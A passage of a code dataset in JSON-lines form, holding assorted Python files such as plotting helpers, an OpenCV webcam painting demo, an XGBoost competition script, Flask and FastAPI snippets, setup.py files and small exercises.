ax.plot(range(dfTrain.iloc[:,1:].shape[1]), pca.explained_variance_ratio_.cumsum(), linestyle='--',\n drawstyle='steps-mid', color=cust_palt[1], label='Cumulative Explained Variance')\n sns.barplot(np.arange(1,dfTrain.iloc[:,1:].shape[1]+1), pca.explained_variance_ratio_, alpha=0.85, color=cust_palt[0],\n label='Individual Explained Variance', ax=ax)\n ax.set_ylabel('Explained Variance Ratio', fontsize = 14)\n \n #範囲の制限([0,Rank-1,0,1])\n if Rank is None:\n ax.set_title('Explained Variance', fontsize = 20, weight='bold')\n ax.set_xlabel('Number of Principal Components', fontsize = 14)\n plt.legend(loc='center right', fontsize = 13);\n ax.set_xticks([])\n else:\n ax.axis([0,Rank-1,0,1])\n ax.set_title('First ' + str(Rank) + ' Explained Variances', fontsize = 20, weight='bold')\n ax.set_xlabel('Number of Principal Components', fontsize = 14)\n \n plt.tight_layout()\n \n return\n\n\n#pca成分の組み合わせ事のグラフを表示(対応するClmnによって色付け)\n#in :学習済みpcaモデル、pca変換後のtrain, trainの生データ, 色付けするcolumn名\n#※※ グラフはpcaTrainの列数^2の行列で表示されるのであらかじめ次元削減しておくこと ※※\ndef distVarianceforClmn(pca, pcaTrain, Train, colorClmn):\n total_var = pca.explained_variance_ratio_.sum() * 100\n labels = {\n str(i): f\"PC {i+1} ({var:.1f}%)\"\n for i, var in enumerate(pca.explained_variance_ratio_ * 100)\n }\n \n fig = px.scatter_matrix(\n pcaTrain,\n color=Train.iloc[:,1:][colorClmn],\n dimensions=range(pcaTrain.shape[1]),\n labels=labels,\n title=f'Total Explained Variance: {total_var:.2f}% vs ' + colorClmn,\n opacity=0.5,\n color_discrete_sequence=cust_palt[:pcaTrain.shape[1]],\n )\n fig.update_traces(diagonal_visible=False)\n fig.show()\n return","sub_path":"starter_210322/module/tidalUtl/VslUtl.py","file_name":"VslUtl.py","file_ext":"py","file_size_in_byte":10789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"432738413","text":"\"\"\"project 1 Virtual Painting\"\"\"\n\nimport cv2 as cv\nimport numpy as np\n\n\ncap = cv.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\ncap.set(10,100)\n#red,orange, green\nmyColors = [[108, 119, 0, 179, 189, 255],\n [0,105,35,7,166,255],\n [46, 80, 0, 96, 176, 255]]\n #yellow [23,31,0,57,102,255]\n\nmyColorValues = [[0,17,255],[0,128,255],[26,255,0]]\n\n\nmyPoints = [] #[x, y, colorID]\n\ndef drawer(myPoints, myColorValues):\n for point in myPoints:\n cv.circle(imgResult,(point[0],point[1]),10,myColorValues[point[2]],cv.FILLED)\n\n\n\n\ndef findColor(img, myColors, myColorValues):\n imgHSV = cv.cvtColor(img,cv.COLOR_BGR2HSV)\n count = 0\n newPoints = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv.inRange(imgHSV,lower,upper)\n x, y = getContours(mask)\n cv.circle(imgResult,(x,y),10,myColorValues[count],cv.FILLED)\n if x!= 0 and y!=0:\n newPoints.append([x,y,count])\n\n count += 1\n return newPoints\n #cv.imshow(str(color[0]),mask)\ndef getContours(img):\n\n #external - outer details in RETR EXTERNAL\n #aprox chain - give us all elemtns non compress in one detail\n\n contours, hierarchy = cv.findContours(img,cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\n x, y, w, h = 0, 0, 0, 0\n for cnt in contours:\n area = cv.contourArea(cnt)\n #contourldx draw all the contour\n if area >500:\n cv.drawContours(imgResult, cnt, -1, (252, 132, 3), 3)\n perimeter = cv.arcLength(cnt,True) #true bcs its closed\n\n #aprox corner points\n approx = cv.approxPolyDP(cnt, 0.02*perimeter, True)\n x, y , w, h = cv.boundingRect(approx)\n return x+w//2, y\n\nwhile True:\n success, img = cap.read()\n imgResult = img.copy()\n newPoints = findColor(img, myColors, myColorValues)\n if len(newPoints) != 0:\n for newP in newPoints:\n myPoints.append(newP)\n\n if len(myPoints) != 0:\n drawer(myPoints,myColorValues)\n\n cv.imshow('WebCam',imgResult)\n\n if cv.waitKey(1) & 0xFF == ord('q'):\n break\n\n\n\n#Zaczac od 2:10 w filmie","sub_path":"YouTube_OpenCV_3_Hours_Course/project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"430757194","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCV of station features on cluster\n\"\"\"\n\nimport sys\nsys.path.insert(0, 'bosch_helper')\nfrom bosch_helper import *\n\n#%% Load data\nx = pd.read_hdf('numeric_b1_b7_nf149.hdf', 'numeric')\ny_train = pd.read_hdf('numeric_b1_b7_nf149.hdf', 'y_train')\n\ntime_station = pd.read_hdf('time_station.hdf', 'time_station')\n\nx = x.join(time_station)\n\nx_train = x.loc['train']\n#x_train = x_train.iloc[:, :30]\nx_test = x.loc['test']\n#x_test = x_test.iloc[:, :30]\n\n#%% CV\nparams = {'max_depth':14, 'eta':0.03, 'silent':1, 'objective':'binary:logistic', 'nthread':20,\n 'lambda':4, 'subsample':0.9, 'min_child_weight':5, 'booster':'gbtree', 'alpha':0,\n 'base_score':0.0058, 'colsample_bytree':0.6}\n\ncv_results, clfs, running_time = \\\n cross_val_predict_skf_rm_xgb(params, x_train, y_train, \n num_boost_round=80, n_splits=5, \n n_repeats=3, random_state=5870577, \n verbose_eval=True)\n\nresults = {'clfs_cv': clfs, \n 'results_cv': cv_results, \n 'running_time_cv': running_time}\n\n#%% CV results\ncv_train_mean = cv_results['train'].mean(axis=1)\ncv_train_std = cv_results['train'].std(axis=1)\ncv_test_mean = cv_results['test'].mean(axis=1)\ncv_test_std = cv_results['test'].std(axis=1)\n\n#plt.figure(figsize=(14, 7))\n#plt.plot(np.arange(len(cv_train_mean)), cv_train_mean)\n#plt.fill_between(np.arange(len(cv_train_mean)), cv_train_mean-cv_train_std, cv_train_mean+cv_train_std, alpha=0.5)\n#plt.plot(np.arange(len(cv_train_mean)), cv_test_mean)\n#plt.fill_between(np.arange(len(cv_test_mean)), cv_test_mean-cv_test_std, cv_test_mean+cv_test_std, alpha=0.5)\n#plt.legend(['train', 'test'])\n\n#%% Train data model\ndtrain = xgb.DMatrix(x_train, label=y_train)\nparams['seed'] = 587359\nclf = xgb.train(params, dtrain, \n num_boost_round=60,\n feval=mcc_eval, \n evals=[(dtrain, 'train')])\n\ny_train_pred = clf.predict(dtrain)\n\n# Find best threshold \nthresholds = np.linspace(0.01, 0.99, 400)\nmcc = np.array([matthews_corrcoef(y_train, y_train_pred>thr) \n for thr in thresholds])\n#plt.plot(thresholds, mcc)\nbest_threshold = thresholds[mcc.argmax()]\n\nprint('Optimal MCC = {:.3f}'.format(mcc.max()))\nprint('Optimal threshold = {:.3f}'.format(best_threshold))\n\nresults['best_threshold_train'] = best_threshold\nresults['mcc_max_train'] = mcc.max()\nresults['clf_train'] = clf\n\n#%% Predict on test data\ndtest = xgb.DMatrix(x_test)\ny_test_pred = clf.predict(dtest)\ny_test_pred_int = (y_test_pred>best_threshold).astype(int)\n\nsub = pd.read_csv(\"sample_submission.csv.zip\", index_col=0)\nsub[\"Response\"] = y_test_pred_int\nsub.to_csv(\"benchmark_8_submission_cv_6_station.csv.gz\", compression=\"gzip\")\n\nsave_pickle(results, 'results_benchmark_8_cv_6_station.pickle')","sub_path":"benchmark_features/benchmark_8/cv6/benchmark_8_numeric_features_CV_6_stations.py","file_name":"benchmark_8_numeric_features_CV_6_stations.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"439363869","text":"import os\nimport time\nimport sys\n\n\n\t\ndef file_combine(file_boot,file_app,file_all):\n\tfs_boot = open(file_boot,'rb')\n\tfs_app = open(file_app,'rb')\n\tfs_all = open(file_all,'wb')\n\tboot_data = fs_boot.read()\n\tboot_extra_data = []\n\tapp_data = fs_app.read()\n\tboot_size = os.path.getsize(file_boot)\n\tapp_size = os.path.getsize(file_app)\n\tfs_all.write(boot_data)\n\textra_data_len = 0x10000 - boot_size\n\tprint(extra_data_len)\n\tfor i in range(extra_data_len):\n\t\tboot_extra_data.append(0xff)\n\tprint(len(boot_extra_data))\n\tfs_all.write(bytes(boot_extra_data))\t\n\tfs_all.write(app_data)\t\n\t\nif __name__ == '__main__':\n\tprint(sys.argv[1])\n\tprint(sys.argv[2])\n\tprint(sys.argv[3])\n\tfile_combine(sys.argv[1],sys.argv[2],sys.argv[3])\n\n\t\n\n\t\n\t","sub_path":"boot_app_file_combine/boot_app_combine.py","file_name":"boot_app_combine.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"116818494","text":"class optimal_sol():\r\n # the logic here is that if the numbers are sorted and not missing any element inbetween then\r\n # the difference between numbers and their indices shoudl be same\r\n # ex: a=[1,2,3,4,5,6,7], low =0, high =6 mid element is a[3]=4 and a[low]=1 and a[high] = 7\r\n #a[3]-3=1 and a[4]-4=1 and a[0]-1=1\r\n def missing_number(self,a):\r\n low= 0\r\n high = len(a)-1\r\n\r\n while high - low >=2 : #search until 2 numbers are\r\n mid = (low + high) // 2\r\n middiff = a[mid] - mid\r\n lowdiff = a[low]-low\r\n #highdiff = a[high]-high\r\n if (middiff != lowdiff): #left part has missing number\r\n high=mid\r\n else:\r\n low=mid #right part has missing number\r\n return (a[low] + a[high])/2\r\nclass Solution(object):\r\n def missingNumber(self, nums):\r\n \"\"\"\r\n        :type nums: List[int]\r\n        :rtype: int\r\n        \"\"\"\r\n self.nums=nums\r\n self.n=max(self.nums)\r\n #print(self.n,len(nums))\r\n sum_n=(self.n*((self.n)+1))/2\r\n sum_arr = sum(self.nums)\r\n dif = sum_n - sum_arr\r\n return dif\r\n #print(sum_n,sum_arr)\r\n\r\n\r\n\r\na=[2,3,4,6,7,8,9]\r\nf= optimal_sol()\r\nprint(f.missing_number(a))\r\n\r\n\r\n\r\n","sub_path":"problem 11.py","file_name":"problem 11.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"222561163","text":"from fastapi import APIRouter, status\nfrom app.services.auth import auth\n\n# Setup Router\nrouter = APIRouter()\n\n# Handle home page view\n@router.get('/', status_code=status.HTTP_200_OK)\nasync def get_token():\n email:str ='user@test.com'\n access_token = auth.get_access_token(email)\n return {'token': access_token}","sub_path":"app/views/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"50857585","text":"import xlrd\r\nfrom xlutils.copy import copy\r\n\r\ndef cdfindbalance():\r\n tbook=xlrd.open_workbook(\"accounts.xlt\") #reading testxlrd.xlsx file which is in same folder\r\n tsheet=tbook.sheet_by_index(0) #assigning sheet with index=0 i.e., 1st sheet to object:sheet \r\n total_rows=tsheet.nrows\r\n total_cols=tsheet.ncols\r\n dtemp=0\r\n ctemp=0\r\n for i in range(0,total_rows):\r\n dtemp=dtemp+tsheet.cell(i,1).value\r\n ctemp=ctemp+tsheet.cell(i,2).value\r\n print(dtemp)\r\n print(ctemp)\r\n if(dtemp==ctemp):\r\n print(\"credit and debit equal\")\r\n else:\r\n print(\"credit and debit not equal\")\r\ndef findbalance():\r\n tbook=xlrd.open_workbook(\"accounts.xlt\") #reading testxlrd.xlsx file which is in same folder\r\n tsheet=tbook.sheet_by_index(0) #assigning sheet with index=0 i.e., 1st sheet to object:sheet \r\n total_rows=tsheet.nrows\r\n total_cols=tsheet.ncols\r\n wb=copy(tbook)\r\n w_sheet = wb.get_sheet(0)\r\n for i in range(0,total_rows):\r\n temp=tsheet.cell(i,1).value-tsheet.cell(i,2).value\r\n tempbalance=tsheet.cell(i,3).value+temp\r\n w_sheet.write(i,3,tempbalance)\r\n wb.save('accounts.xlt')\r\ndef alplbalance():\r\n tbook=xlrd.open_workbook(\"accounts.xlt\") #reading testxlrd.xlsx file which is in same folder\r\n tsheet=tbook.sheet_by_index(0) #assigning sheet with index=0 i.e., 1st sheet to object:sheet \r\n total_rows=tsheet.nrows\r\n total_cols=tsheet.ncols\r\n altemp=0\r\n pltemp=0\r\n for i in range(0,total_rows):\r\n if i < 29:\r\n altemp=altemp+tsheet.cell(i,3).value\r\n else:\r\n pltemp=pltemp+tsheet.cell(i,3).value\r\n print(altemp)\r\n print(pltemp)\r\ndef findprofitorloss():\r\n profit=0\r\n loss=0\r\n asset=0\r\n liability=0\r\n tbook=xlrd.open_workbook(\"accounts.xlt\",\"a\") #reading testxlrd.xlsx file which is in same folder\r\n tsheet=tbook.sheet_by_index(0) #assigning sheet with index=0 i.e., 1st sheet to object:sheet \r\n total_rows=tsheet.nrows\r\n for i in range(32,36):\r\n profit=profit+tsheet.cell(i,3).value\r\n for i in range(37,42):\r\n loss=loss+tsheet.cell(i,3).value\r\n for i in range(3,13):\r\n asset=asset+tsheet.cell(i,3).value\r\n for i in range(15,29):\r\n liability=liability+tsheet.cell(i,3).value\r\n print(profit,loss,asset,liability)\r\n if (profit>loss and asset>liability):\r\n print('profit')\r\n else:\r\n print('loss')\r\n ","sub_path":"accountss_22735/findbalance.py","file_name":"findbalance.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"185711675","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nif __name__ == '__main__':\n s = input(\"Введите предложение: \")\n n = int(input(\"Введите длину: \"))\n if len(s) >= n:\n print(\"Заданная длина должна быть больше длины предложения\",file=sys.stderr)\n exit(1)\n words = s.split(' ')\n if len(words) < 2:\n print(\"Предложение должно содержать несколько слов\",file=sys.stderr)\n exit(1)\n delta = n\n for word in words:\n delta -= len(word)\n w, r = delta // (len(words) - 1), delta % (len(words) - 1)\n lst = []\n for i, word in enumerate(words):\n lst.append(word)\n if i < len(words) - 1:\n width = w\n if r > 0:\n width += 1\n r -= 1\n if width > 0:\n lst.append(' ' * width)\n print(''.join(lst))\n","sub_path":"Задания/Пример3.py","file_name":"Пример3.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"282304674","text":"import urllib.request, urllib.parse, urllib.error\nimport xml.etree.ElementTree as ET\nimport ssl\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter location: ')\ntotal = 0\nprint('Retrieving', url)\ndata = urllib.request.urlopen(url, context=ctx).read()\nprint('Retrieved', len(data), 'characters')\ndata = ET.fromstring(data)\ndata = data.findall('.//comment')\ncounts = list()\nfor item in data :\n counts.append(item.find('count').text)\nprint('Count:', len(counts))\n\ntotal = 0\nfor count in counts :\n count = int(count)\n total = total + count\nprint('Sum:', total)\n","sub_path":"Course3/Assignment13.1.py","file_name":"Assignment13.1.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"127349293","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nButterfly - A sleek web based terminal emulator\n\"\"\"\nimport os\nimport re\nfrom setuptools import setup\n\nROOT = os.path.dirname(__file__)\nwith open(os.path.join(ROOT, 'butterfly', '__init__.py')) as fd:\n __version__ = re.search(\"__version__ = '([^']+)'\", fd.read()).group(1)\n\noptions = dict(\n name=\"butterfly-workspace\",\n version=__version__,\n description=\"A sleek web based terminal emulator (forked for Workspace)\",\n long_description=\"See http://github.com/angl/butterfly\",\n author=\"Florian Mounier\",\n author_email=\"paradoxxx.zero@gmail.com\",\n url=\"http://github.com/paradoxxxzero/butterfly\",\n license=\"GPLv3\",\n platforms=\"Any\",\n scripts=['butterfly.server.py', 'scripts/butterfly', 'scripts/b'],\n packages=['butterfly'],\n install_requires=[\"tornado>=3.2\", \"pyOpenSSL\", 'tornado_systemd'],\n extras_requires=[\"libsass\"],\n package_data={\n 'butterfly': [\n 'sass/*.sass',\n 'themes/*.*',\n 'themes/*/*.*',\n 'themes/*/*/*.*',\n 'static/fonts/*',\n 'static/images/favicon.png',\n 'static/main.css',\n 'static/html-sanitizer.js',\n 'static/*.min.js',\n 'templates/index.html',\n 'bin/*',\n 'templates/motd',\n 'butterfly.conf.default'\n ]\n },\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Terminals\"])\n\nsetup(**options)\n","sub_path":"pypi_install_script/butterfly-workspace-3.0.4.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"290709324","text":"import json\nimport redis\nimport string\nfrom flask import Flask, request, jsonify, render_template\nfrom model import Note\n\n\napp = Flask('todopi')\nrds = redis.StrictRedis(host='localhost', port=6379, db=0)\npriorities=string.ascii_uppercase\n\n\ndef save_note(note):\n # add note to hash with note ID as key\n rds.hmset(note.uid, Note.dict_repr(note))\n # add note ID to index list\n rds.lpush('notes', note.uid)\n\n\ndef get_notes(sort_by='priority', fmt=None):\n notes = []\n\n indices = rds.lrange('notes', 0, -1)\n app.logger.debug(\"found %d note IDs in index\" % len(indices))\n\n for index in indices:\n notes.append(Note(**rds.hgetall(index)))\n\n notes = Note.sort(notes, sort_by=sort_by)\n\n if fmt == 'json':\n notes = { 'notes': Note.dict_repr(notes) }\n\n return notes\n\n\n@app.route(\"/\")\ndef notes():\n sort_by = request.args.get('sort_by', 'priority')\n app.logger.debug(\"sort notes by: %s\" % sort_by)\n\n if 'html' in request.headers.get('accept'):\n return render_template('notes.html',\n notes=get_notes(sort_by=sort_by),\n priorities=priorities)\n else:\n return jsonify(get_notes(sort_by=sort_by, fmt='json'))\n\n\n@app.route(\"/save\", methods=['POST'])\ndef save():\n req = request.get_json()\n app.logger.debug(req)\n if req.get('content') is None or req.get('priority') not in priorities:\n return \"\", 400\n\n save_note(Note(**{\n 'content': req.get('content'),\n 'priority': req.get('priority'),\n 'project': req.get('project'),\n 'context': req.get('context')\n }))\n return \"\", 204\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='127.0.0.1')\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"14061356","text":"#!/usr/bin/env python\n\nimport sys\nimport time\nimport argparse\nfrom subprocess import call\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--name', '-n', required=True, type=str, help='Name of the cluster.')\nparser.add_argument('--zone', '-z', required=False, type=str, default='us-central1-b', help='Zone of the cluster.')\nparser.add_argument('--notebook', '--nb', action='store_true')\nargs = parser.parse_args()\n\ncmd = ' '.join([\n 'gcloud compute ssh',\n '{}'.format(args.name + '-m'),\n '--zone={}'.format(args.zone),\n '--ssh-flag=\"-D 10000 -N -f -n\"',\n '> /dev/null 2>&1 &'\n])\ncall(cmd, shell=True)\n\n# if notebook flag, open connection to 8123, otherwise open to 4040 (Spark UI)\nif args.notebook:\n port = '8123'\nelse:\n port = '4040'\n\n# wait\ntime.sleep(2)\n\n# open Chrome with SOCKS proxy configuration\nbrowser_exec = r'/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome'\ncmd = ' '.join([\n browser_exec,\n 'http://localhost:{}'.format(port),\n '--proxy-server=\"socks5://localhost:10000\"',\n '--host-resolver-rules=\"MAP * 0.0.0.0 , EXCLUDE localhost\"',\n '--user-data-dir=/tmp/',\n '> /dev/null 2>&1 &'\n])\ncall(cmd, shell=True)\n","sub_path":"connect_cluster.py","file_name":"connect_cluster.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"648259143","text":"print('-'*30)\nprint('LOJA SUPER BARATÃO')\nprint('-'*30)\n\ntotal = maior1000 = preco = 0\nnome_menor = ' '\n\nwhile True:\n continuar = ' '\n nome = input('Nome do Produto:')\n preco = float(input('Preço: R$'))\n total += preco\n if preco > 1000:\n maior1000 += 1\n if preco == total:\n menor = preco\n nome_menor = nome\n if preco < menor:\n menor = preco\n nome_menor = nome\n while continuar not in ('SN'):\n continuar = input('Quer continuar? [S/N] ').upper().strip()[0]\n if continuar == 'N':\n break\nprint('--------- FIM DO PROGRAMA ----------- ')\nprint(f'O total da compra foi de R${total:.2f}')\nprint(f'Temos {maior1000} produtos custando mais de R$ 1000.00')\nprint(f'O produto mais barato foi {nome_menor} que custa R${menor:.2f}')","sub_path":"ex070.py","file_name":"ex070.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"374651181","text":"import pytest\nfrom sqlalchemy import (\n Column,\n Integer,\n MetaData,\n String,\n Table,\n create_engine,\n insert,\n)\n\nfrom exasol.driver.odbc import (\n ODBC_DRIVER,\n odbcconfig,\n)\n\n\n@pytest.fixture\ndef pyodbc_connection_string(exasol_config):\n config = exasol_config\n return (\n f\"exa+pyodbc://{config.username}:{config.password}@{config.host}:{config.port}/\"\n f\"?DEFAULTPARAMSIZE=200&INTTYPESINRESULTSIFPOSSIBLE=y\"\n \"&FINGERPRINT=NOCERTCHECK&CONNECTIONLCALL=en_US.UTF-8&driver=EXAODBC\"\n )\n\n\n@pytest.fixture()\ndef test_schema(control_connection):\n connection = control_connection\n schema = \"REGRESSION_335\"\n connection.execute(f\"CREATE SCHEMA {schema}\")\n connection.commit()\n yield schema\n connection.execute(f\"DROP SCHEMA IF EXISTS {schema} CASCADE\")\n connection.commit()\n\n\n@pytest.fixture()\ndef users_table(control_connection, test_schema):\n connection = control_connection\n table_name = \"users\"\n connection.execute(\n f\"create table {test_schema}.{table_name} (id DECIMAL(18) identity primary key, name VARCHAR(2000) UTF8)\"\n )\n connection.commit()\n yield test_schema, table_name\n\n\ndef test_lastrowid_does_not_create_extra_commit(\n exasol_config, users_table, pyodbc_connection_string\n):\n \"\"\"\n For further details on this regression see `Issue-335 `_.\n \"\"\"\n schema_name, table_name = users_table\n metadata = MetaData()\n engine = create_engine(pyodbc_connection_string)\n\n table = Table(\n table_name,\n metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String(2000)),\n schema=schema_name,\n )\n\n with odbcconfig(ODBC_DRIVER):\n conn = engine.connect()\n trans = conn.begin()\n\n # Insert without an explicit ID will trigger a call to `get_lastrowid`\n # which in turn cause the unintended autocommit\n insert_statement = insert(table).values(name=\"Gandalf\")\n conn.execute(insert_statement)\n trans.rollback()\n\n result = conn.execute(f\"SELECT * FROM {schema_name}.{table_name};\").fetchall()\n conn.close()\n\n assert len(result) == 0\n","sub_path":"test/integration/regression/test_regression_bug335.py","file_name":"test_regression_bug335.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"599750449","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nfrom setuptools import setup, find_packages\nfrom fnmatch import fnmatchcase\nfrom distutils.util import convert_path\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nstandard_exclude = ('*.py', '*.pyc', '*~', '.*', '*.bak', '*.swp*')\nstandard_exclude_directories = ('.*', 'CVS', '_darcs', './build', './dist', 'EGG-INFO', '*.egg-info')\ndef find_package_data(where='.', package='', exclude=standard_exclude, exclude_directories=standard_exclude_directories):\n out = {}\n stack = [(convert_path(where), '', package)]\n while stack:\n where, prefix, package = stack.pop(0)\n for name in os.listdir(where):\n fn = os.path.join(where, name)\n if os.path.isdir(fn):\n bad_name = False\n for pattern in exclude_directories:\n if (fnmatchcase(name, pattern)\n or fn.lower() == pattern.lower()):\n bad_name = True\n break\n if bad_name:\n continue\n if os.path.isfile(os.path.join(fn, '__init__.py')):\n if not package:\n new_package = name\n else:\n new_package = package + '.' + name\n stack.append((fn, '', new_package))\n else:\n stack.append((fn, prefix + name + '/', package))\n else:\n bad_name = False\n for pattern in exclude:\n if (fnmatchcase(name, pattern)\n or fn.lower() == pattern.lower()):\n bad_name = True\n break\n if bad_name:\n continue\n out.setdefault(package, []).append(prefix+name)\n return out\n\nsetup(name='docassemble.base',\n version='0.2.89',\n description=('The base components of the docassemble system.'),\n long_description=read(\"README.md\"),\n long_description_content_type='text/markdown',\n author='Jonathan Pyle',\n author_email='jhpyle@gmail.com',\n license='MIT',\n url='https://docassemble.org',\n download_url='https://download.docassemble.org/docassemble-base.tar.gz',\n namespace_packages = ['docassemble'],\n install_requires = ['docassemble==0.2.89', '3to2', 'astunparse', 'babel', 'bcrypt', 'blinker', 'cffi', 'fdfgen', 'guess-language-spirit', 'httplib2', 'itsdangerous', 'jellyfish==0.5.6', 'jinja2', 'lxml', 'mako', 'markdown', 'markupsafe', 'mdx-smartypants', 'namedentities==1.5.2', 'passlib', 'pdfminer', 'pillow', 'pip', 'pycparser', 'pycrypto', 'geopy', 'pygments', 'pyjwt', 'pypdf', 'pypdftk', 'PyPDF2', 'python-dateutil', 'pytz', 'pyyaml', 'ruamel.yaml', 'qrcode', 'six', 'titlecase', 'wheel', 'pattern', 'tzlocal', 'us', 'phonenumbers', 'pycountry', 'ua-parser', 'user-agents', 'textstat', 'twine', 'docxtpl', 'qrtools'],\n packages=find_packages(),\n zip_safe = False,\n package_data=find_package_data(where='docassemble/base/', package='docassemble.base'),\n )\n","sub_path":"docassemble_base/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"240075240","text":"import importlib\nimport os\nimport pkgutil\n\nfrom crc.api.common import ApiError\n\n\nclass Script(object):\n \"\"\" Provides an abstract class that defines how scripts should work, this\n must be extended in all Script Tasks.\"\"\"\n\n def get_description(self):\n raise ApiError(\"invalid_script\",\n \"This script does not supply a description.\")\n\n def do_task(self, task, study_id, workflow_id, **kwargs):\n raise ApiError(\"invalid_script\",\n \"This is an internal error. The script you are trying to execute '%s' \" % self.__class__.__name__ +\n \"does not properly implement the do_task function.\")\n\n def do_task_validate_only(self, task, study_id, workflow_id, **kwargs):\n raise ApiError(\"invalid_script\",\n \"This is an internal error. The script you are trying to execute '%s' \" % self.__class__.__name__ +\n \"does must provide a validate_only option that mimics the do_task, \" +\n \"but does not make external calls or database updates.\" )\n\n @staticmethod\n def get_all_subclasses():\n return Script._get_all_subclasses(Script)\n\n @staticmethod\n def _get_all_subclasses(cls):\n\n # hackish mess to make sure we have all the modules loaded for the scripts\n pkg_dir = os.path.dirname(__file__)\n for (module_loader, name, ispkg) in pkgutil.iter_modules([pkg_dir]):\n importlib.import_module('.' + name, __package__)\n\n\n \"\"\"Returns a list of all classes that extend this class.\"\"\"\n all_subclasses = []\n\n for subclass in cls.__subclasses__():\n all_subclasses.append(subclass)\n all_subclasses.extend(Script._get_all_subclasses(subclass))\n\n return all_subclasses\n\n def add_data_to_task(self, task, data):\n key = self.__class__.__name__\n if key in task.data:\n task.data[key].update(data)\n else:\n task.data[key] = data\n\nclass ScriptValidationError:\n\n def __init__(self, code, message):\n self.code = code\n self.message = message\n\n @classmethod\n def from_api_error(cls, api_error: ApiError):\n return cls(api_error.code, api_error.message)\n","sub_path":"crc/scripts/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"106372434","text":"import os\n\nfrom PyQt5.QtWidgets import (QDialog, QDialogButtonBox, QFormLayout, \n QPushButton, QDialogButtonBox, QFileDialog, QHBoxLayout, QLabel, \n QGroupBox, QVBoxLayout, QFrame, QListView,)\nfrom PyQt5.QtGui import QIcon\n\nclass NewExperiment(QDialog):\n \"\"\"A modal window to parameter a new experiment\n \"\"\"\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setWindowTitle('New Experiment')\n self.resize(800, 600)\n \n \n self.directory = os.path.os.getcwd() # project directory\n self.dirLabel = QLabel(self.directory) # currently set project directory\n \n browseBtn = QPushButton(QIcon.fromTheme('folder'), '', self)\n\n dataForm = QGroupBox(self.tr('Path to data directory'), self)\n\n formLayout = QFormLayout(dataForm)\n formLayout.addRow(browseBtn, self.dirLabel)\n\n modalLayout = QHBoxLayout()\n setupLayout = QVBoxLayout()\n previewLayout = QVBoxLayout()\n\n setupLayout.addWidget(dataForm)\n setupLayout.addStretch(1)\n\n fileFrame = QFrame(self)\n\n previewLayout.addChildWidget(fileFrame)\n previewLayout.addStretch(1)\n\n \n\n modalLayout.addLayout(setupLayout)\n modalLayout.addLayout(previewLayout)\n modalLayout.addStretch(1)\n\n self.setLayout(modalLayout)\n\n\n browseBtn.clicked.connect(self.select_directory)\n \n def select_directory(self):\n self.directory = QFileDialog.getExistingDirectory(self, \"RMN Data directory\", self.directory)\n self.dirLabel.setText(self.directory)\n \n","sub_path":"package/dialogs/InitModal.py","file_name":"InitModal.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"244105826","text":"class Conversor():\n\n def for_decimal(self, n_hex, base):\n letras = {\n \"A\": 